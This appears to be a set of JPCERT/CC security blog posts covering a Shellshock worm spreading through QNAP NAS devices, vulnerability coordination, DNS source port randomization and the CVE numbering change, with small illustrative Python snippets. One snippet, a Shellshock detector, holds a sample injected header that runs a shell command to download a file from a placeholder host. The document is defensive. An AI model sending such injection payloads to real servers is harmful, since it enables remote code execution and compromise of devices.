
Dec 25, 2014

Increase in Possible Scan Activity from NAS Devices

Happy holidays to all, this is Tetsuya from the Watch and Warning Group. Today, I would like to share a notable recent trend discovered through TSUBAME sensors.


In TSUBAME, we have observed a significant increase in packets destined for 8080/TCP since December 5th, 2014. When we accessed the source IP addresses with a web browser, many of them, particularly addresses from certain regions, displayed the admin login screen of NAS devices provided by QNAP.


[Figure 1: Scan count per hour observed at 8080/TCP from December 2nd, 2014 onwards (Source: TSUBAME)]


Below are some characteristics that we noticed from TSUBAME data:

  - Increase in packets to port 8080/TCP since December 5th, 2014

  - The TTL value for most packets was between 30 and 59

  - Each scan attempt sends 1-2 packets (the second packet is a retransmission)

  - A source IP does not repeatedly scan a particular destination IP (the majority scan only once)
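As an illustrative sketch only (hypothetical code, not part of TSUBAME), packets matching the observed profile could be flagged like this, assuming packet records are simple dicts produced by some capture parser:

```python
def matches_scan_profile(pkt):
    """Return True if a packet looks like the observed 8080/TCP scan."""
    return (
        pkt.get("proto") == "TCP"
        and pkt.get("dst_port") == 8080
        and 30 <= pkt.get("ttl", 0) <= 59   # observed TTL range
    )

packets = [
    {"proto": "TCP", "dst_port": 8080, "ttl": 44},   # matches the profile
    {"proto": "TCP", "dst_port": 8080, "ttl": 120},  # TTL out of range
    {"proto": "TCP", "dst_port": 22,   "ttl": 50},   # wrong port
]

hits = [p for p in packets if matches_scan_profile(p)]
print(len(hits))  # 1
```

In practice such a filter would run over parsed capture data; the field names here are assumptions for the sake of the example.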



We were also able to verify the following by checking some of the source IP addresses:

  - Accessing port 80/TCP of a source address redirects to port 8080/TCP, where the admin login screen of a QNAP NAS is shown

  - The QNAP firmware appears to be version 4.1.0 or earlier (based on the information shown on the login screen; versions 4.1.0 and earlier are affected by Shellshock) (*1)


In an environment separate from TSUBAME, we examined the packets sent by an infected QNAP device and observed requests such as the following (several types of requests exist).


[Figure 2: Sample request from infected device (Source: JPCERT/CC)]


When a QNAP NAS device running a vulnerable firmware version receives this request, the Shellshock vulnerability is leveraged to download and execute a malicious program from the Internet, infecting the device with malware (*2, *3). Once infected, the device begins to search for other vulnerable NAS devices. We believe this self-propagating activity infected a large number of NAS devices and is the reason for the sudden increase in packets to 8080/TCP.
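The request in Figure 2 is the one actually observed; as a generic illustration only (not the exact payload seen here), the well-known Shellshock marker "() {" in an HTTP header value, which vulnerable Bash-backed CGI handlers interpret as a function definition followed by injected commands, can be spotted with a simple check:

```python
import re

# Characteristic Shellshock marker: an empty function definition "() {"
# at the start of an environment-variable value.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

def looks_like_shellshock(headers):
    """Return True if any HTTP header value carries the Shellshock pattern."""
    return any(SHELLSHOCK_RE.search(v) for v in headers.values())

benign = {"User-Agent": "Mozilla/5.0"}
# Hypothetical hostile request; the URL and command are placeholders.
hostile = {"User-Agent": "() { :;}; /bin/sh -c 'wget http://example.test/x'"}

print(looks_like_shellshock(benign))   # False
print(looks_like_shellshock(hostile))  # True
```

A check like this only catches the classic pattern; real IDS signatures for CVE-2014-6271 and its variants are more involved.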


The vendor has released firmware that addresses the Shellshock vulnerability. If you have not yet applied the update, we recommend that you first check (*2) whether you have been infected.


  JVN#55667175 QNAP QTS vulnerable to OS command injection (*1)



  The Shellshock Aftershock for NAS Administrators (*2)



  Worm Backdoors and Secures QNAP Network Storage Devices (*3)



  An Urgent Fix on the Reported Infection of a Variant of GNU Bash Environment Variable Command Injection Vulnerability (*4)



Thank you for reading, and we wish you all the best for the coming year.


- Tetsuya Mizuno

Dec 11, 2014

Year in Review - Vulnerability Handling and Changing with the Times

Hello and Happy Holiday Season to everybody.

This is Taki again, and today I will write about some of our experiences in product (software and hardware) vulnerability coordination this year.


 - Introduction -

A lot happened this year, and I do not have time to go through everything, but I would like to cover some of the major issues we handled and, for those who are not familiar, provide a brief overview of our coordination activities.

Before I move on: our vulnerability advisories are published on Japan Vulnerability Notes (JVN). Other CSIRTs across the globe have similar sites, such as CERT/CC and NCSC-FI. While CERT/CC publishes quite a few advisories each year, NCSC-FI publishes only a handful of high-profile issues per year that affect a large number of users.

The number of published advisories on JVN is shown below.



[Figure 1 - Number of product vulnerability-related advisories published on JVN per quarter since the 2nd quarter of 2011 (Source: JPCERT/CC)]


What can be seen on JVN are advisories for product vulnerabilities, which direct users to fixes, updates, patches, etc. for the products they use. However, these advisories represent only a small portion of the work involved in our vulnerability handling activities.

We coordinate the disclosure of product vulnerabilities with developers and researchers so that they do not become 0-days, in which information about a vulnerability is disclosed before users have a way to resolve it. Some of you may have heard the phrase "Coordinated Disclosure," which is what we attempt to practice.


 - This Year -

This past year, we were involved in a few high profile cases which even received media attention.

 One of these issues was the so-called "Heartbleed" vulnerability in OpenSSL. There are quite a few articles on the web that describe the disclosure timeline, so I will not get into those details here. As an aside, here is a previous entry that describes how Japanese organizations dealt with Heartbleed.

We received information on this issue a few days prior to disclosure from one of our global counterparts. Just as we were about to begin the coordination process with developers, the issue was disclosed by the OpenSSL team.

This case taught us (again!) that while reports may be sent to us in a confidential manner, this does not mean that we are the only ones that have this information.


[Figure 2 - Sample image of vulnerability handling information flow during a coordination effort (What a mess!) (Source: JPCERT/CC)]

This is especially true in cases involving open-source software. There were quite a few high-profile advisories involving OpenSSL this year (CCS Injection, the POODLE attack, etc.), which eventually led the OpenSSL team to release a new security policy related to addressing vulnerabilities.

Pre-disclosure, or notification prior to public disclosure, for such open source products has traditionally been done through mailing lists or separate e-mails to relevant parties. Now most major open source projects pre-disclose only to certain groups of developers who need fixes first, and the rest of the world learns of the issue at the same time. This is also true for software provided by the Internet Systems Consortium (ISC), such as BIND.

- The next step in vulnerability handling -

My experiences over this past year have shown me not only that more and more people are looking for vulnerabilities, but also that vulnerability information moves at high speed among a variety of parties, some of whom have no idea that another group also holds the information.

In general, the fewer parties involved in a coordination effort, the better. Not only does this reduce the probability that the information is disclosed prematurely, but it also gives the developer better control over how the non-public vulnerability information is handled.

As a coordination center, we serve as an intermediary between reporters and developers. If a reporter can report to and communicate with the developer directly, then I believe they should do so. Our involvement in such cases is unnecessary and in fact costs time, since each communication has to pass through an additional party.

However, for cases involving open-source software that is incorporated into various products, broader coordination becomes necessary, and this is where we can (and have been able to) provide value in a coordination effort.

Vulnerability handling has evolved from a series of one-to-one communications into cases where various parties (often not in contact with each other) are involved at the same time. Hopefully we can continue to evolve with the times and provide maximum value to coordination efforts, ensuring that the proper information reaches the relevant parties.

I wish everybody a safe and wonderful holiday season!

Takayuki (Taki) Uchiyama

Apr 18, 2014

Source Port Randomization for Caching DNS Servers Requested, yet again.

Hello, this is Moto Kawasaki, a new member of the Global Coordination Division.


Alerts from JPRS and JPCERT/CC

On April 14th, 2014, JPRS (Japan Registry Services Co., Ltd.) and JPCERT/CC concurrently published alerts on DNS cache poisoning attacks.


     Alert from JPRS

     http://jprs.jp/tech/security/2014-04-15-portrandomization.html (Japanese version)


     Alert from JPCERT/CC

     https://www.jpcert.or.jp/english/at/2014/at140016.html (English version)

     https://www.jpcert.or.jp/at/2014/at140016.html (Japanese version)


Now I'd like to elaborate on the key points and share my views on the case by reading between the lines of these alerts.


The effect of source port randomization against cache poisoning

In its alert, JPRS requested that DNS server administrators randomize the UDP source port from which caching DNS servers send out query packets, as a mitigation against cache poisoning attacks.


Cache poisoning is a long-standing threat to caching DNS servers: an attacker injects arbitrary entries into the cache and diverts users to malicious web sites, mail servers, and so forth.

In 2008, Dan Kaminsky disclosed a method that defeats the TTL (Time-To-Live) protection by using names that are not in the cache as query names. This astonished people because it made continuous attacks possible, shortening the attack window from "once in several hours" to "almost anytime".


On the other hand, source port randomization is considered the first-choice, mandatory mitigation. Because it makes it difficult for attackers to predict which port in the randomized range they should send malicious packets to, source port randomization reduces the probability of a successful attack by a factor of a few tens of thousands. This is why JPRS recommends source port randomization.
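As a rough back-of-the-envelope illustration (assumed figures, not numbers from the JPRS alert): a forged response must already match the 16-bit DNS transaction ID, and with source port randomization it must also match the ephemeral source port, multiplying the attacker's search space:

```python
TXID_SPACE = 2**16          # 65,536 possible 16-bit transaction IDs
PORT_SPACE = 64512          # ephemeral ports 1024-65535 (assumed range)

p_fixed_port = 1 / TXID_SPACE                   # guess TXID only
p_random_port = 1 / (TXID_SPACE * PORT_SPACE)   # guess TXID and source port

print(f"fixed port:  1 in {TXID_SPACE:,} per forged response")
print(f"random port: 1 in {TXID_SPACE * PORT_SPACE:,} per forged response")
print(f"improvement: roughly x{PORT_SPACE:,}")
```

The exact ephemeral port range varies by operating system and configuration, so the factor is approximate; the point is that randomization pushes a per-response success probability from one in tens of thousands to one in billions.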


But why did we re-emphasize the risk of cache poisoning attacks and the importance of source port randomization now? JPRS explained in their alert by referring to two recent findings.

One is that JPRS had been informed by large ISPs in Japan that they were observing an increase in cache poisoning attacks using Kaminsky's method.

The other is that JPRS found that approximately 10% of the source IP addresses sending DNS queries to the JP DNS servers still did NOT randomize their source ports.

JPRS kindly supplied a graph (Figure 1) showing the proportion of source port randomization observed over time. The graph shows several cliffs, swells, and an overall declining trend. One of the cliffs might reflect the aftereffects of Kaminsky's presentation, or the release of DNS software that randomizes the source port by default. Even now, 10% of the IP addresses still send queries from static (fixed) or limited (predictable) source ports.


[Figure 1: Transition of source port randomization status (Apr 2006 to Apr 2014) (Source: JPRS, http://jprs.jp/tech/security/2014-04-15-portrandomization-status-e.pdf)]


These findings imply, I think, that a large number of caching DNS servers are still vulnerable to cache poisoning, which can escalate into domain name hijacking and other attacks against the users of those servers.


Our gratitude and action in the near future

Based on the list of vulnerable caching DNS servers provided by JPRS, JPCERT/CC is going to notify the administrators so that they can fix their settings. It is our great pleasure to cooperate with other parties, as we did with JPRS in handling this case.


Finally, I hope this blog entry will help address the issue and make a world of randomized source ports :-)


Thank you.

Moto Kawasaki

Jul 09, 2013

The votes are in - and we have a new CVE numbering scheme!

[Update 2013.8.1]
MITRE has prepared a page describing the change in CVE format.
The page is at the following:

   CVE-ID Syntax Change

As stated on the site, this change is scheduled to take effect on January 1, 2014. The page describes some of the background behind the change, and towards the bottom there is a list of frequently asked questions.

Hello, this is Taki again and this is an update to a previous entry that I wrote on CVE identifiers.

For details on what CVE is, please refer to my previous entry or the CVE website.

As I wrote in my previous entry, CVE is undergoing a numbering scheme change and the editorial board voting has been completed.

After two rounds of voting, Option B was selected as the new numbering scheme.
To review, Option B specifies the following (directly from the above link):

- Variable length
- 4-digit Year + four fixed digits for IDs up to 9999
- IDs 0001 through 0999 padded with leading zeros
- IDs over 9999 will expand as needed, no leading zeros


- Four-digit IDs (through 9999)
    - CVE-2014-0001, CVE-2014-0999
    - CVE-2014-1234, CVE-2014-9999

- Five-digit IDs (> 9999)
    - CVE-2014-10000, CVE-2014-54321, CVE-2014-99999

- Six-digit IDs (> 99999)
    - CVE-2014-100000, CVE-2014-123456, CVE-2014-999999

- Etc., as needed

According to MITRE, this new scheme will become effective January 1, 2014.
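As a sketch of what validating the new format might look like (my own reading of Option B, not an official MITRE implementation): the sequence number is at least four digits, zero-padded only up to 0999, and longer IDs carry no leading zeros.

```python
import re

# Option B as I read it: "0ddd" for IDs 1-999, otherwise a number of
# four or more digits with no leading zero.
CVE_B_RE = re.compile(r"^CVE-\d{4}-(?:0\d{3}|[1-9]\d{3,})$")

def is_valid_option_b(cve_id):
    """Return True if cve_id matches the Option B syntax."""
    if not CVE_B_RE.match(cve_id):
        return False
    # Reject the all-zero sequence number, which is not a real ID.
    return int(cve_id.rsplit("-", 1)[1]) >= 1

for cve in ["CVE-2014-0001", "CVE-2014-9999", "CVE-2014-10000",
            "CVE-2014-123456", "CVE-2014-001", "CVE-2014-012345"]:
    print(cve, is_valid_option_b(cve))
# The first four print True; the last two (too short, leading zero
# on a long ID) print False.
```

Tools that store CVE IDs in fixed-width fields would need a similar change, which is exactly the kind of transition work mentioned below.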

Transition plans and other specifics will become available as time goes on.
If there are any developments, I will notify via this blog.

For any questions, please contact me at vultures(at)jpcert.or.jp

- Taki Uchiyama


Feb 13, 2013

CVE is about to undergo a change in syntax for CVE identifiers

Hello, it's Taki here and it has been a long time since I last wrote here.

Today's topic is about the following:

Call for Public Feedback on Upcoming CVE ID Syntax Change

Before I get into the details of what is said here, I would like to quickly introduce CVE. CVE stands for Common Vulnerabilities and Exposures and it is managed by The MITRE Corporation in the US. CVE identifiers are unique, common identifiers for publicly known information security vulnerabilities. For more details on CVE identifiers, please refer to the following:

About CVE Identifiers

So getting back to the topic: CVE is about to undergo a change in the syntax of CVE identifiers. The current syntax, CVE-YYYY-NNNN, can only support a maximum of 9,999 unique identifiers in a given year.

There are many users of CVE across the globe and a syntax change may affect a number of users, thus the CVE project is soliciting feedback prior to changing the syntax.

There are 3 choices, and I will list them in my order of preference with some reasoning behind each placement. (For details on the exact syntax of each option, please refer to the MITRE announcement)

1. Option A
This requires the least change, and I expect that users already familiar with the current CVE syntax should be able to make the transition without too many issues. Selfishly speaking, since this option requires the least change, it would also be easier to explain to newer users of CVE what changed and why.

2. Option C
This is quite a drastic change from the current syntax but with the inclusion of the check digit, it would allow users to verify that the CVE identifier is a valid one. However, this syntax may be a little difficult to handle for product developers that incorporate CVE identifiers into their products.

3. Option B
I went back and forth a little between Options B and C, but the check digit in Option C, which allows for validation (albeit by a simple method), made the choice for me. In my opinion, with Option B it would be hard to determine whether an ID is valid, since the number of digits is arbitrary.

JPCERT/CC has been working with MITRE since 2008 to have CVEs issued for advisories on Japan Vulnerability Notes (JVN). Since then, JVN has become CVE compatible and JPCERT/CC has become a CVE Numbering Authority (CNA). As a member of the vulnerability handling team, I have listed my opinions here and would certainly welcome any feedback or discussion.

As mentioned on the MITRE announcement, there is a mailing list for discussions as well.

Any questions should be directed to the mailing list, but if you would like to have a discussion offline, please feel free to contact me at vultures(at)jpcert.or.jp.

- Taki Uchiyama